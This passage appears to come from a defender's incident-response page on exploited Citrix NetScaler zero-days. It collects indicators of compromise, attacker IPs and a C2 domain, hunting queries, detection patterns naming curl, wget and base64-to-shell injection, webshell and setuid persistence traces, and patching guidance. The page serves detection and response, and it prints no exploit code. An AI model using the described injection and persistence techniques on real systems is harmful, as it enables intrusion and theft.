/netscaler.local/and a Perl-namedns_*.plthat is not a real appliance script, and/var/core/.ns-cache/holdingclient.crtandclient.key(present only if the agent enrolled). - On the network:
POST /api/v1/agents/enrollwith anapplication/x-protobuf-platypus-v2content type, a WebSocket to/api/v1/agent/linkover mutual TLS, and the_platypus-mesh._tcpmDNS service on UDP/5353, which also finds a second infected host on the segment. - Pivot on the shared cluster certificate, its public-key hash or the embedded signing key, not on file hashes: the operator rebuilds, so hashes are short-lived.
- An upgrade keeps persistent storage, so the agent's files survive patching. A fixed build tells you it was patched, not that it is clean.
Source: TENEX. Appliance logs show attempts reaching the handler, not that commands ran.
Poppelgaard checker Script, v1.11
A free, read-only shell script for the appliance (sh ctx697096_check.sh --ioc) that checks fixed-build status and public indicators, and tags each attack line as before or after the fix. Release 1.11 (2 Oct) adds a SAML status check based on Citrix's new guidance. Release 1.9 (1 Oct) adds Arctic Wolf's nsmon.pl implant, the Unit 42 .deb webshell and more attacker IPs. Its author says a clean result is not proof of a clean box; run it before rebooting or upgrading, and use it together with the Citrix IoC scan.
Source: Poppelgaard on GitHub. A third-party tool; read it before you run it on a production appliance.
New SAML issue (2 Oct) Citrix guidance
- Check your configuration for
add authentication samlAction.*andadd authentication samlIdPProfile.*. Citrix says an appliance with either, on a Gateway or AAA virtual server, is affected. [2] - Beaumont's grep for authentication-daemon crashes and restarts in
/var/log/ns.log:proc nsaaad.*(SIGNALED|EXITED)|maximum number of restarts|Pitboss declaring system failure|All monitored processes have exited, rebooting. A match is a lead, not proof. [74] - The write-up screenshotted in that post also suggests: preserve the logs and any
nsaaad-*.gzcores (ls -lt /var/core), check for a file/v, and check outbound firewall records for connections to213.209.159.55:443and*.pyrlink.cc(sic — the screenshot's spelling; the registered domain ispylrk.cc). It stresses that a negative search covers only retained logs and that attempts are not confirmed execution. Unverified, author not named. [74] - Citrix has released a responder policy as a mitigation, distributed through Citrix Support (3 October, under NDA). It is not in the public post yet. The Poppelgaard checker verifies whether it is bound, alongside the earlier
RSP_POL_DROPand communitypol_samlauth_block_v2policies, and warns when a policy is bound but the Responder feature is disabled - the policy is then silently ignored. Beaumont reports the Support-shared policy "doesn't work for me" (Oct 2) and that "the Citrix support mitigations don't appear to work" (Oct 3). [39] - On Citrix's post, a commenter (Jens Dellner) asks why Citrix has not published a Global Deny List of known-malicious IPs for this issue; Citrix has not replied. The site's blocklists are a partial stand-in, built only from public IoCs. [2]
- Block
*.pylrk.ccinbound and outbound (this site's recommendation, matching NCSC-NL's guidance of 3 October): inbound, the actor uses the domain as a payload-delivery source for the SAML attack; outbound, the FreeBSD Sliver implant found on compromised appliances beacons to it as C2 (hardcodedhttps://www.pylrk.ccin the implant, which also resolves its C2 via DNS). Use the domain blocklist (plain version). Never block the resolved Cloudflare proxy IPs — block the DNS name. Hunt rather than only block: DNS and proxy logs for*.pylrk.cctell you whether an appliance reached the domain before your block was in place.
Citrix says this is independent of CTX697096 and a bulletin is planned. Check the Citrix post for updates.
Unit 42 hunting query XQL
Stage 1 of the CVE-2026-88771 chain writes a Base64 dropper from the User-Agent into /var/log/httpaccess-vpn.log; stage 2 poisons /var/log/ns.log with a fake pitboss message. Unit 42's Cortex XQL query groups the commands found after NSPPE. A hit is log poisoning, not proof of execution on a patched device; on an unpatched device the poisoned entry will run.
dataset = citrix_adc_raw // replace with citrix_netscaler_raw if required
| filter _raw_log contains "pitboss"
| alter log_type = arrayindex(regextract(_raw_log, "<[^>]+>(?:[A-Za-z]{3}[ ]+[0-9]{1,2}[ ]+|[ ]+[0-9]{2}/[0-9]{2}/[0-9]{4}:)[0-9]{2}:[0-9]{2}:[0-9]{2}.+default ([\w]+)"), 0),
log_sub_type = arrayindex(regextract(_raw_log, "<[^>]+>(?:[A-Za-z]{3}[ ]+[0-9]{1,2}[ ]+|[ ]+[0-9]{2}/[0-9]{2}/[0-9]{4}:)[0-9]{2}:[0-9]{2}:[0-9]{2}.+default [\w]+ ([\w]+)"), 0),
command_attempted = arrayindex(regextract(_raw_log, "pitboss PPE unexpectedly died NSPPE(?:\-00|)\;(.+)\>, factor"), 0)
| filter command_attempted != null
| comp earliest(_time) as first_seen, latest(_time) as last_seen, values(log_type) as log_type, count() by command_attempted
Source: Unit 42 threat brief
LevelBlue behaviour signals Not independently confirmed
- Authentication fields with
pitboss,NSPPE,unexpectedly diedor${IFS}next to curl, wget, whoami, perl, python, tar or cat. A command-substitution variant uses backticks instead of semicolons. - New
.local_journal,insight-new.jsorxua.htmlunder/var/netscaler/logon/. - Access to or archiving of
/flash/nsconfig, and asec_monitorsuperuser inns.conf. - Changes to
/var/python/bin/customsnmpd, and/bin/shset to 6555.
Source: LevelBlue SpiderLabs; The Hacker News covers the same findings. [87]
Beazley: where to look Startup and scheduled jobs
Beazley's checklist includes /var/cron/tabs/, the root and nsroot crontabs, /nsconfig/rc.netscaler and /nsconfig/nsafter.sh, and it notes that attackers have used cron jobs to remove forensic artefacts. Beazley lists nsafter.sh as a place to review; it does not report an attacker using it.
Source: Beazley BSL-A1216
CERT-EU hunting patterns Passive
- base64 strings in the
User-Agentheader that start withINDEX:. PPE missed too many heartbeatsentries in authentication logs.- Check that
httpd.confis intact, for example by looking for the AliasMatch in the IoC table.
Source: CERT-EU writeup
Sygnia: where to look Passive
These are normal appliance files and logs, not IoCs. Sygnia lists them as places to review.
- Web server config:
/etc/httpd.conf,/nsconfig/httpd.conf,/flash/nsconfig/httpd.confand/nsconfig/https.conf. Look for unauthorized AddHandler, SetHandler, Alias, AliasMatch, php_flag or php_value directives. - Startup persistence:
/flash/nsconfig/rc.netscalerand other startup locations. - Shell history and notices:
/var/log/notice.log*,/var/log/sh.log*and/var/log/bash.log*, including attempts to delete/var/coreartifacts. - Web errors:
/var/log/httperror*for unexpected files in web-accessible directories. A missing-file request is not the same as a file being created or run. - Permissions:
/bin/shwith mode 6555, or any unexplained setuid or setgid change.
Execution may be delayed, so Sygnia advises correlating suspicious requests with host and network activity for at least 24 hours.
Source: Sygnia advisory
CISA SIGMA rule TLP:CLEAR
CISA's Code & Media Analysis team published a SIGMA detection rule (added to the CISA alert on October 2) covering known exploitation and post-exploitation activity for CVE-2026-88771 and CVE-2026-88772. It hunts the pitboss PPE unexpectedly died and PPE missed too many heartbeats messages, INDEX: base64 user-agent strings, /nf/auth/doAuthentication.do requests combined with the crash messages, the .ctxs.receiver webshell path combined with the nsgclient18.deb droppers or ns_monuploadd_err.pl, and base64-decode piped-to-shell patterns. Rule status is "test"; CISA says it may update the rule as more information becomes available, and recommends converting it with a local Sigma installation.
Source: CISA SIGMA Rules repository; CISA alert, updated Oct 2. Every keyword in the rule was already on this page's IoC table and detection cards; the rule bundles them into SIEM queries.
CIRCL TR-100 Config check
For each CVE, CIRCL gives CLI commands that check whether your appliance's configuration exposes it. Run them on appliances you administer.
Source: CIRCL TR-100
Citrix Console IoC checker Limits per Beaumont Validated
- Available only through support or under NDA. [64]
- Incomplete: it does not check for suid on
/bin/sh. [67] - Citrix's own documentation says the IoC information "might be of limited forensic value and might fail to identify actual compromises", and advises retaining experienced forensic investigators. [6]
- In the field, the Console scanner has flagged base64 content referencing the
.ctxs.receiverwebshell, "Certificate digest verification failed" (possibly tampered certificate or key files) and "Binary Fingerprinting detected", according to one practitioner's notes. [107] - Citrix also points to Console File Integrity Monitoring for unexpected file changes, and recommends forwarding NetScaler logs to an external SIEM. [4]
- The bulletin text itself lists no generic IoCs: they come only through the Console scan (version 14.1-73.36 or later, telemetry enabled, started manually) or from Citrix Support. NCSC-NL's 1.0.1 revision says the same. [4][9]
- Misses earlier semi-successful attempts once logs have rotated. [65]
- Citrix keeps updating the detection logic, and Console shows when an update is available. Version 4 was released by 1 October (validated independently). If you scanned earlier, scan again. [6]
The missing suid check and the log-rotation gap were validated independently on 29 September. The NDA point has not been verified.
Beaumont also says Some really big orgs are backdoored after patching still
. That claim is not independently verified. He has asked national CSIRTs (NCSCs) to publish a detection script. [67]
GTIG/Mandiant artefacts and YARA Passive
Successful CVE-2026-88772 exploitation left two log artefacts:
- In syslog, an
SSL_HANDSHAKE_FAILUREwithClientVersion DTLSv1.0andReason "Handshake failure-Internal Error". - In
/var/log/messages, an NSPPE termination logged bypitboss, the watchdog daemon that restarts crashed processes.
Also look for httpd.conf changes that make the web server treat other file types as PHP, such as AddHandler application/x-httpd-php .deb.
GTIG publishes five YARA rules: G_APT_Backdoorwebshell_WHIPSHOT_1, G_APT_Tunneler_SLAPSHOT_1, G_Hunting_Backdoorwebshell_NetScaler_C2Headers_1, G_Hunting_Config_NetScaler_PHP_1 and G_Hunting_Script_NetScaler_Persistence_1. This page links to them rather than copying them.
Source: GTIG/Mandiant advisory
Nextron THOR Scanner rules
As of 29 September, Nextron has three rules in the THOR Preview channel:
LOG_SUSP_EXPL_CVE_2026_88771_Sep26WEBSHELL_CSS_PassThrough_Sep26, which detects the webshell's behaviour, not only its filenameEXPL_CVE_2026_88772_POC_Sep26, which detects PoC artefacts, not attacks on an appliance
Nextron also published a YAML filesystem IoC set derived from Citrix's scanner script. It covers 12 of the script's checks, consolidated into four file rules. It leaves out the 22 checks that depend on logs, configuration or runtime state.
Preview-channel rules have not finished manual QA, so expect more false positives than with stable rules. A match is a lead for investigation, not proof of compromise.
Source: Nextron Systems
Community detection rules Rules
- Elastic: "Potential NetScaler Log Poisoning Command Injection Attempt", an EQL rule on Citrix ADC logs. Merged on 28 September.
- Sigma pull request #6352: shell metacharacters sent to the NetScaler authentication endpoint. Not yet merged.
- Corelight: Zeek hunting queries, including a search for the reverse-shell IP in the IoC table.
- Nuclei pull request #17336: an active injection probe, not a version check. It writes to the target's logs, so run it only on systems you own or administer. Not yet merged.
- Lupovis suggests two hunts:
POST /nf/auth/doAuthentication.dorequests whose body containspitboss PPE unexpectedly died NSPPE, and DNS lookups from a NetScaler ending ininstances.httpworkbench.com. [98]
Beazley Security Labs checks Passive
Beazley's BSL-A1216 advisory lists read-only shell checks. It splits them into those to run before patching (the web-server config, /bin/sh permissions and NX-CVE-OK test markers, which a reboot rebuilds) and those that persist across upgrades (hidden files under /var/netscaler/logon). It also recommends comparing /etc/httpd.conf with a clean appliance on the same build.
Source: Beazley Security Labs BSL-A1216
watchTowr Detection Artefact Generators Active tests
These tools send traffic to an appliance. Run them only against systems you own or administer. This page links to the repositories. It does not reproduce their code or payloads.
- CVE-2026-88771: watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88771. This is the only PoC-class tool Beaumont vouches for. That was validated independently on 29 September, though the post itself has not been found.
- CVE-2026-88772: watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88772. It sends 120 DTLS records (about 176,640 bytes) to the gateway and measures the response.
Beaumont describes the other GitHub "PoCs" he has seen as fake AI slop. That is his characterisation. [71]
Remediation: patching NetScaler ADC and Gateway
In short: check for compromise and preserve evidence first, then upgrade to 14.1-73.37 or 13.1-64.23 or later (FIPS/NDcPP builds below), per Citrix CTX697096 as of 30 September 2026. Patching does not remove an existing backdoor. [1]
Fixed builds (Citrix CTX697096)
| Fixed build, exactly as listed by Citrix |
|---|
| NetScaler ADC/Gateway 14.1-73.37 and later |
| NetScaler ADC/Gateway 13.1-64.23 and later |
| NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later |
| NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later |
Source: Citrix CTX697096. Use the bulletin as the authority for which build applies to your deployment.
13.1 upgrades: watchTowr advises running show ns variable first. If it returns any variables, use 13.1-64.24 to avoid a known reboot loop during the upgrade; Citrix lists this as a known issue in 13.1-64.23, not a vulnerability. [94][4] CVE-2026-88778 is fixed by enabling Enhanced ISN Generation, not by the upgrade alone. [21]
Other notes from Citrix: the NetScaler VPX 15.1 Technology Preview is also vulnerable. It is not permitted in production and Citrix says a fix will follow. The Console Security Advisory scan may wrongly flag 13.1-64.23 as vulnerable until the next automatic advisory update, with no need to upgrade Console. samlRejectUnsignedAssertion OFF is no longer supported and is converted to the secure default on upgrade, so make sure your identity provider signs SAML assertions. [4]
Cloudflare WAF: Cloudflare shipped an emergency managed rule on 1 October that blocks the CVE-2026-88771 improper-input-validation pattern. It covers only that CVE, and Cloudflare itself says to apply the latest versions to secure the origin. Treat it as a stopgap for appliances that sit behind Cloudflare, not a substitute for patching or a compromise check. [85]
Secure Private Access: Citrix says Secure Private Access Hybrid deployments that use NetScaler instances are also affected, so those instances need the same upgrade. The bulletin applies only to customer-managed NetScaler ADC and Gateway; Citrix upgrades its own managed cloud services and Citrix-managed Adaptive Authentication. [1]
End-of-life releases: NetScaler ADC and Gateway 12.1 and 13.0 are end of life, receive no fix and are likely vulnerable. Migrate them to a supported release. [23][60]
The bulletin is inconsistent about the last build. Its fixed-builds list says 13.1.37.279, while its affected-versions list says "FIPS and NDcPP BEFORE 13.1-37.279". Truesec and IFIN use 13.1-37.279. The table above keeps Citrix's fixed-builds wording exactly.
After patching
- Check for compromise and preserve evidence before you patch. Mandiant's CTO, Charles Carmakal, says customers should examine their systems
for compromise *before* upgrading/patching
. [95] Unit 42 lists the evidence to capture: [96]- a NetScaler VPX instance snapshot
- logs on remote syslog servers and in NetScaler Console
- a technical support bundle
- a packet engine core dump
- Patch to a fixed build from the table above.
- Hunt for compromise. Check for:
- webshells, including the GreyNoise path and alias above
- changes to
httpd.conf, such as an unexpected AliasMatch - unusual permissions on
/bin/sh, such as setuid or setgid
- If compromise is suspected or confirmed, Citrix's CTX694799 says to:
- take the appliance off the network;
- change every secret stored on it on the systems it talks to (LDAP and RADIUS secrets, OAuth tokens, API keys, SNMP community names) and the passwords of users who signed in through it, and revoke its certificates and private keys;
- check the servers and systems it connected to, especially authentication servers and management jump hosts;
- rebuild rather than clean: replace a VPX instance, wipe and reinstall an MPX, upgrade the firmware, then restore a known good configuration backup that pre-dates the compromise;
- rotate the local passwords and key encryption keys again after the restore, replace the restored certificates, and monitor closely for at least 90 days.
- Assume activity may be weeks old. Beaumont says slow disclosure means attackers have been active for weeks. [65]
Patching closes the vulnerabilities. It does not reverse a compromise that already happened. This page does not give remediation commands or guarantees. Follow Citrix and your national CSIRT.
NetScaler zero-day FAQ
Is there a new NetScaler issue involving SAML?
Citrix published guidance on 2 Oct 2026 for a newly observed, configuration-dependent issue in NetScaler deployments that use SAML authentication on a Gateway or AAA virtual server. It says the issue is independent of CTX697096 and that a security bulletin and product update are planned. No CVE, affected versions or fixed builds were listed yet. Beaumont reports his patched honeypots crashing, which is one researcher's observation. This site covers CVE-2026-88771 and CVE-2026-88772; the SAML issue is not part of CTX697096. [2][74][75]
What is PitScaler?
PitScaler is the name Kevin Beaumont gave on 28 Sep 2026 to the exploitation of Citrix NetScaler ADC and NetScaler Gateway zero-days CVE-2026-88771 and CVE-2026-88772. Citrix disclosed them, with six other CVEs, in bulletin CTX697096 on 27 Sep 2026. [66][1]
Which NetScaler vulnerabilities are exploited?
CVE-2026-88771 (unauthenticated remote command execution in the default configuration, CVSS 4.0 9.5) and CVE-2026-88772 (DTLS memory overflow leading to RCE or DoS, CVSS 4.0 9.5). CISA added both to its KEV catalog on 27 Sep 2026 with a 30 Sep deadline. Kevin Beaumont reports CVE-2026-88773 was chained with the two, but no other source has independently confirmed that. No exploitation is reported for CVE-2026-88774 to CVE-2026-88778. [1][20][63]
Which NetScaler versions fix CVE-2026-88771 and CVE-2026-88772?
Per CTX697096: NetScaler ADC/Gateway 14.1-73.37 and later; 13.1-64.23 and later; ADC 14.1-FIPS 14.1-73.37 FIPS and later; ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.279 and later (the bulletin also writes this build as 13.1-37.279). [1]
Does patching remove a NetScaler backdoor?
No. Patching closes the vulnerabilities but does not remove webshells or configuration changes planted before the update. Check for compromise and preserve evidence (logs, memory, a VM snapshot) before patching, then patch. [64][34][27]
How do I check a NetScaler for compromise?
Look for AddHandler or AliasMatch changes in httpd.conf that make non-PHP files run as PHP; PHP code in VPN script and media directories such as /var/netscaler/gui/vpn/scripts/linux/; a setuid bit on /bin/sh; /tmp/.uxdport and /tmp/.uxdlock (SLAPSHOT); and DTLSv1.0 SSL_HANDSHAKE_FAILURE log entries followed by an NSPPE crash. Beaumont reports that the Citrix checker misses the /bin/sh setuid check, so a clean scan does not clear a host. [34][27][53][67]
When did the exploitation start?
Unit 42 traces version fingerprinting from 21 Aug 2026 (not exploitation) and .deb webshell requests from 4 Sep. eSentire saw CVE-2026-88771 exploited as early as 5 Sep 2026, more than three weeks before disclosure, and Google GTIG and Mandiant report CVE-2026-88772 exploitation since at least early September. Australia's ACSC advises reviewing for compromise since at least 4 Sep 2026. GreyNoise recorded a CVE-2026-88771 attempt on 24 Sep 2026. [48][34][17][53]
Who is behind the attacks?
No vendor has publicly attributed the activity to a named threat actor as of 1 Oct 2026. Mandiant's CTO says advanced and suspected state-sponsored actors are likely behind the initial targeted CVE-2026-88772 intrusions, without naming one, and Kevin Beaumont calls the attackers probably nation-state aligned. Both are assessments, not a confirmed attribution. [43][63][84]
Should I shut down or disconnect my NetScaler?
Before patches existed, many organisations were advised to shut down or disconnect NetScaler appliances: the Dutch central government applied "disconnect unless" from 26 Sep 2026, and Danish agencies including PET, the Armed Forces and the police switched theirs off. Now that fixed builds exist, GTIG/Mandiant recommend upgrading, isolating only appliances with confirmed or suspected compromise, and, if patching is delayed, disabling DTLS or blocking inbound UDP/443 upstream (this mitigates CVE-2026-88772 only, not CVE-2026-88771). [25][99][82][34]
Were CVE-2026-88771 and CVE-2026-88772 exploited as zero-days?
Yes. Citrix confirmed exploitation on unmitigated appliances when it disclosed them on 27 Sep 2026. eSentire saw CVE-2026-88771 exploited from 5 Sep, and GreyNoise recorded an attempt on 24 Sep, before any patch or CVE was public. [1][48][53]
Who found the NetScaler zero-days?
The exploited flaws were found during incident response: BleepingComputer reports Citrix discovered them while investigating incidents at customers, and watchTowr says they were discovered during forensics. The CTX697096 bulletin credits Michael Tucker, Chew Keong Tan and Alex Bernier of the JPMorgan Chase XOR Team, and Maxim Suhanov, without saying which CVE each reported. The Stack reports it understands the JPMorgan team disclosed the vulnerabilities, and says it could not independently confirm a disclosure timeline. [82][51][1][83]
Is PitScaler a live incident feed?
No. PitScaler is an independent historical snapshot, last updated 3 October 2026, 18:31 UTC. Check official advisories such as Citrix CTX697096 and the CISA alert for current status. [1][7]
How many NetScaler appliances are exposed?
Censys counted 42,735 NetScaler hosts on 28 Sep 2026, Unit 42 counted 50,277 potentially vulnerable exposed instances on 27 Sep, and Shadowserver reports more than 20,000 instances exposed and potentially at risk. These are exposure counts, not confirmed compromises. [60][96][97]
References
Bracketed numbers in the text, such as [1], point to the rows below. Every link below is the exact URL from the compiled dataset. IFIN, Truesec, GTIG/Mandiant, Nextron, The Register, Unit 42, the Dutch government letter, two more Beaumont posts, the CVE record, a second BleepingComputer article, the Canada, HKCERT and ACSC advisories, eSentire, Beazley Security Labs, Ingeniøren, DKCERT, NHS England, the CERT-EU advisory, SDxCentral, heise, Dark Reading, Lupovis's own post, and the Censys, Shadowserver, Lupovis, Beazley, Corelight, Elastic, Sigma and Nuclei material were added later, on 29 September. Links marked verification pending did not load in an automated check at build time. The URL has been kept unchanged, not replaced. For all other links, the check only showed that the page loaded, not that its content was reviewed.
| # | Source | Type | URL |
|---|---|---|---|
| 1 | Citrix - CTX697096 security bulletin (Sep 27) | Primary official advisories | https://support.citrix.com/external/article/CTX697096/citrix-netscaler-adc-and-citrix-netscale.html |
| 2 | Citrix community blog - Security Update: Guidance for NetScaler SAML Authentication Deployments (Oct 2; new issue, independent of CTX697096) | Primary official advisories | https://community.citrix.com/techzone-blogs/110_security-updates/security-update-guidance-for-netscaler-saml-authentication-deployments/ |
| 3 | Citrix - CTX694799 Steps to Take if NetScaler ADC is Suspected to be Compromised | Primary official advisories | https://support.citrix.com/external/article/CTX694799/steps-to-take-if-netscaler-adc-is-suspec.html |
| 4 | Citrix community blog - Security Bulletin for CVE-2026-88771 through CVE-2026-88778 (incl. IoC section; last updated Sep 30) verification pending | Primary official advisories | https://community.citrix.com/techzone-blogs/110_security-updates/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve-2026-88771-through-cve-2026-88778/ |
| 5 | Citrix (CTX-Michael) on r/Citrix, Sep 27 - CRITICAL UPDATE announcement | Primary official advisories | https://www.reddit.com/r/Citrix/comments/1wro1yf/critical_update_citrix_netscaler_adc_and_citrix/ |
| 6 | NetScaler Console documentation - Indicators of Compromise detection (incl. Citrix disclaimer on limits) | Primary official advisories | https://docs.netscaler.com/en-us/netscaler-console-service/instance-advisory/ioc |
| 7 | CISA alert - Critical zero-day vulnerabilities exploited in Citrix NetScaler ADC/Gateway (Sep 27; updated Oct 2 with a SIGMA detection rule) | Primary official advisories | https://www.cisa.gov/news-events/alerts/2026/09/27/critical-zero-day-vulnerabilities-exploited-citrix-netscaler-adc-gateway |
| 8 | CISA Code & Media Analysis SIGMA rule - Citrix NetScaler CVE-2026-88771 and CVE-2026-88772 (TLP:CLEAR, test status; repo may be updated) | Primary official advisories | https://github.com/cisagov/SIGMA_Rules/blob/develop/CMA_SIGMA_Citrix_CVE_2026_8871.yaml |
| 9 | NCSC-NL advisory NCSC-2026-0394, version 1.0.1 (Sep 30; probability high, damage high; per-CVE scores and preconditions) | Primary official advisories | https://advisories.ncsc.nl/2026/ncsc-2026-0394.html |
| 10 | NCSC-UK - Exploitation of vulnerabilities affecting Citrix NetScaler ADC and Gateway | Primary official advisories | https://www.ncsc.gov.uk/news/exploitation-of-vulnerabilities-affecting-citrix-netscaler-adc-and-citrix-netscaler-gateway |
| 11 | CSA Singapore - AL-2026-129 | Primary official advisories | https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2026-129/ |
| 12 | Canadian Centre for Cyber Security - AL26-024 | Primary official advisories | https://www.cyber.gc.ca/en/alerts-advisories/al26-024-critical-vulnerabilities-affecting-citrix-netscaler-adc-netscaler-gateway-cve-2026-88771-cve-2026-88772 |
| 13 | CERT-FR alert CERTFR-2026-ALE-011 (Sep 28, updated Sep 30) | Primary official advisories | https://cert.ssi.gouv.fr/alerte/CERTFR-2026-ALE-011/ |
| 14 | CSSF (Luxembourg) communique - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28) | Primary official advisories | https://www.cssf.lu/en/2026/09/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway/ |
| 15 | CERT Quebec CERTQC-AVIS-2026-364 (Sep 28, TLP:CLEAR) | Primary official advisories | https://www.cyber.gouv.qc.ca/avis/certqc-avis-2026-364 |
| 16 | HKCERT - Citrix Products Multiple Vulnerabilities (Sep 28) | Primary official advisories | https://www.hkcert.org/security-bulletin/citrix-products-multiple-vulnerabilities_20260928 |
| 17 | ACSC (Australia) - Critical vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (28 Sep; updated 3 Oct with the new SAML issue and confirmed Australian impacts) | Primary official advisories | https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-vulnerabilities-in-citrix-netscaler-adc-and-citrix-netscaler-gateway-products |
| 18 | BSI (Germany) - Citrix NetScaler: Systeme werden ueber ZeroDay-Schwachstellen angegriffen, BITS-H 2026-289305-1132, version 1.1 (Oct 1, TLP:CLEAR) | Primary official advisories | https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2026/2026-289305-1032.pdf?__blob=publicationFile&v=4 |
| 19 | NCSC-FI / Traficom (Finland) - Citrix NetScaler vulnerabilities exploited in Finland (1 Oct; intrusions in Finland before the patches) | Primary official advisories | https://kyberturvallisuuskeskus.fi/en/news/citrix-netscaler-vulnerabilities-exploited-finland |
| 20 | CISA Known Exploited Vulnerabilities catalog (both CVEs added Sep 27, due Sep 30) | Primary official advisories | https://www.cisa.gov/known-exploited-vulnerabilities-catalog |
| 21 | CERT-EU Security Advisory 2026-014 - Critical Vulnerabilities in Citrix NetScaler ADC and Gateway (Sep 27) | Primary official advisories | https://cert.europa.eu/publications/security-advisories/2026-014/ |
| 22 | DKCERT (CERT for Danish universities and research) - To kritiske NetScaler 0-dage udnyttes aktivt før patch (Sep 29) | Primary official advisories | https://cert.dk/node/639 |
| 23 | NHS England Digital cyber alert CC-4858 (Sep 28) - Exploitation of zero-day vulnerabilities affecting Citrix NetScaler | Primary official advisories | https://digital.nhs.uk/cyber-alerts/2026/cc-4858 |
| 24 | CIRCL TR-100 - per-CVE configuration-check CLI commands | Primary official advisories | https://www.circl.lu/pub/tr-100/ |
| 25 | Dutch government letter to parliament - Kwetsbaarheden Citrix Netscaler (2026D47262, Sep 29) | Primary official advisories | https://www.tweedekamer.nl/kamerstukken/brieven_regering/detail?id=2026D47262&did=2026D47262 |
| 26 | CVE.org - CVE-2026-88771 record (reserved Sep 10 07:14 UTC by NetScaler; published Sep 27 16:02 UTC) | Primary official advisories | https://www.cve.org/CVERecord?id=CVE-2026-88771 |
| 27 | CERT-EU - Taking "execute logging" a bit too literally - CVE-2026-88771 (Sep 28) | Technical research | https://www.cert.europa.eu/blog/taking-execute-logging-a-bit-too-literally-cve-2026-88771 |
| 28 | watchTowr Labs part 1 - Oh Look, the Foot Gun Went Off Again (CVE-2026-88771) (Sep 28) | Technical research | https://labs.watchtowr.com/oh-look-the-foot-gun-went-off-again-citrix-netscaler-preauth-command-injection-cve-2026-88771/ |
| 29 | watchTowr Detection Artefact Generator - CVE-2026-88771 (GitHub) | Technical research | https://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88771 |
| 30 | watchTowr Labs part 2 - Here We Go Again (CVE-2026-88772), Sina Kheirkhah (Sep 29) | Technical research | https://labs.watchtowr.com/here-we-go-again-citrix-netscaler-dtls-preauth-memory-overflow-cve-2026-88772/ |
| 31 | watchTowr Detection Artefact Generator - CVE-2026-88772 (GitHub) | Technical research | https://github.com/watchtowrlabs/watchTowr-vs-Citrix-Netscaler-CVE-2026-88772 |
| 32 | Martin's Blog (mac.sploit.dk) - "NetScaler Needs More Than Another Patch" (Oct 2 08:00 CEST; opinion/analysis: platform posture, 15.1 Linux Tech Preview, what to demand at renewal) | Technical research | https://mac.sploit.dk/blog/netscaler-needs-more-than-a-patch/ |
| 33 | Truesec - Multiple Critical Vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway (Sep 28) | Technical research | https://www.truesec.com/hub/blog/multiple-critical-vulnerabilities-in-citrix-netscaler-adc-and-netscaler-gateway |
| 34 | Google GTIG / Mandiant - Defending Against Active Exploitation of Citrix NetScaler ADC and Gateway Appliances (Sep 29) | Technical research | https://cloud.google.com/blog/topics/threat-intelligence/defending-against-active-exploitation-of-citrix-netscaler-adc-and-gateway-appliances |
| 35 | Nextron Systems (Florian Roth) - New THOR Detection Coverage for CVE-2026-88771 and CVE-2026-88772 (Sep 29) | Technical research | https://www.nextron-systems.com/2026/09/29/new-thor-detection-coverage-for-citrix-netscaler-cve-2026-88771-and-cve-2026-88772/ |
| 36 | Arctic Wolf - Citrix NetScaler Active Exploitation via CVE-2026-88771 (IoC pack, Sep 30) | Technical research | https://github.com/rtkwlf/wolf-tools/tree/main/pack_alerts/202609-citrix-netscaler-active-exploitation-cve-2026-88771 |
| 37 | Sygnia - Actively Exploited NetScaler Vulnerabilities (IR-based advisory, Sep 30) | Technical research | https://www.sygnia.co/threat-reports-and-advisories/actively-exploited-netscaler-vulnerabilities/ |
| 38 | TENEX - What TENEX Observed Inside Active Exploitation of CVE-2026-88771 (Sep 30) | Technical research | https://tenex.ai/blog/what-tenex-observed-inside-active-exploitation-of-netscaler-zero-day/ |
| 39 | Poppelgaard - NetScaler CTX697096 checker (free read-only script; v1.11 released Oct 2 20:35 UTC, updated Oct 3) | Technical research | https://github.com/ThomasPoppelgaard/netscaler-ctx697096-checker |
| 40 | Poppelgaard - CVE-2026-88771 through CVE-2026-88778, what you should know and how to fix (Sep 28, last updated Oct 2) | Technical research | https://www.poppelgaard.com/cve-2026-88771-through-cve-2026-88778-what-you-should-know-and-how-to-fix-your-netscaler-adc-netscaler-gateway |
| 41 | External malware analysis report (TLP:CLEAR, 2 Oct) - "Sliver C2 Implant Delivered via Citrix NetScaler Exploitation (CVE-2026-88771)"; independent static analysis, corroborated by Expel IR observation; shared in the w00w00 Slack tlp-amber-citrix-du-jour thread (3 Oct) | Technical research | https://www.virustotal.com/gui/file/0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027 |
| 42 | LevelBlue SpiderLabs (THOR team) - CVE-2026-88771 Observed Exploitation Artifacts and Hunt Indicators (Sep 30; own findings, not independently confirmed) | Technical research | https://www.levelblue.com/blogs/spiderlabs-blog/citrix-netscaler-cve-2026-88771-observed-exploitation-artifacts-and-hunt-indicators |
| 43 | Beazley Security advisory (updated Sep 29) - IoC table incl. Lupovis honeypot IPs | Technical research | https://beazley.security/alerts-advisories/critical-vulnerability-in-citrix-netscaler-zero-day-prompts-emergency-shutdowns-cve-2026-88771-cve-2026-88772 |
| 44 | Corelight - Hunting Citrix NetScaler zero-days (Zeek queries, Sep 28) | Technical research | https://corelight.com/blog/hunting-citrix-netscaler-zero-days-corelight |
| 45 | Elastic detection rule - Potential NetScaler Log Poisoning Command Injection Attempt (merged Sep 28) | Technical research | https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_netscaler_log_poisoning_command_injection.toml |
| 46 | SigmaHQ pull request #6352 - NetScaler auth endpoint shell metacharacters (open, Sep 29) | Technical research | https://github.com/SigmaHQ/sigma/pull/6352 |
| 47 | Nuclei templates pull request #17336 - CVE-2026-88771 active probe (open, Sep 28) | Technical research | https://github.com/projectdiscovery/nuclei-templates/pull/17336 |
